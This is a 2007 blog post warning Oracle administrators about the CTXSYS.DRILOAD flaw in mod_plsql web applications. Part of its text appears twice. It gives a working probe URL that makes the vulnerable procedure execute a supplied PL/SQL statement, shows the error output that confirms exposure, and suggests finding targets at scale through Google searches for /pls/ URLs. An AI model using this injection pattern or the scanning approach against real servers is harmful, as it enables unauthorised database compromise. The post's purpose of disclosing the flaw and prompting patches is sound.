Flickr photos
Recent links
Oracle vulnerabilities
2007, October 25 - 15:40 — müzso
You can find a number of Oracle database vulnerabilities here, at the Red-Database-Security website. There're quite many, all of them at least one year old or even older. Using them takes not much knowledge and can easily compromise your database (application, server, ...).
Eg. the CTXSYS.DRILOAD bug is extremely easy to exploit. If you're running a web application through mod_plsql, you can test simply through a single link:
If it returns something like this:
then your server is vulnerable ... and if it's hanging on the public net ... ahhh. Make sure you take the necessary steps asap.
One could even write a simple script that would look for publicly available mod_plsql web applications via Google's API (you can use the
So think twice before you put a web app. through mod_plsql on the net!
PS: of course the above bug has been already fixed by Oracle, but I bet there're still a lot of databases running unpatched.
Eg. the CTXSYS.DRILOAD bug is extremely easy to exploit. If you're running a web application through mod_plsql, you can test simply through a single link:
http://example.com/pls/example_dad/ctxsys.driload.validate_stmt?sqlstmt=begin%20null;end;If it returns something like this:
Thu, 25 Oct 2007 14:28:34 GMT
ORA-06510: PL/SQL: unhandled user-defined exception
ORA-06512: at "CTXSYS.DRILOAD", line 42
ORA-01002: fetch out of sequence
ORA-06512: at line 8
DAD name: example_dad
PROCEDURE : ctxsys.driload.validate_stmt
URL : http://example.com:80/pls/example_dad/ctxsys.driload.validate_stmt?sqlstmt=begin%20null;end;
PARAMETERS :
============
sqlstmt:
begin null;end;
ENVIRONMENT:
============
PLSQL_GATEWAY=WebDb
GATEWAY_IVERSION=2
SERVER_SOFTWARE=Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25
GATEWAY_INTERFACE=CGI/1.1
SERVER_PORT=80
SERVER_NAME=example.com
REQUEST_METHOD=GET
(...)then your server is vulnerable ... and if it's hanging on the public net ... ahhh. Make sure you take the necessary steps asap.
One could even write a simple script that would look for publicly available mod_plsql web applications via Google's API (you can use the
inurl search operator to look for URLs with the /pls/ string) and test each of them for this vulnerability. So think twice before you put a web app. through mod_plsql on the net!PS: of course the above bug has been already fixed by Oracle, but I bet there're still a lot of databases running unpatched.
All of my own contents here (if not noted otherwise) are licensed under the
Creative Commons Attribution-NonCommercial-ShareAlike 3.0 License.
Creative Commons Attribution-NonCommercial-ShareAlike 3.0 License.
Recent comments
1 day 20 hours ago
1 week 5 days ago
1 week 6 days ago
1 week 6 days ago
1 week 6 days ago
2 weeks 3 hours ago
2 weeks 3 days ago
2 weeks 3 days ago
4 weeks 1 day ago
4 weeks 1 day ago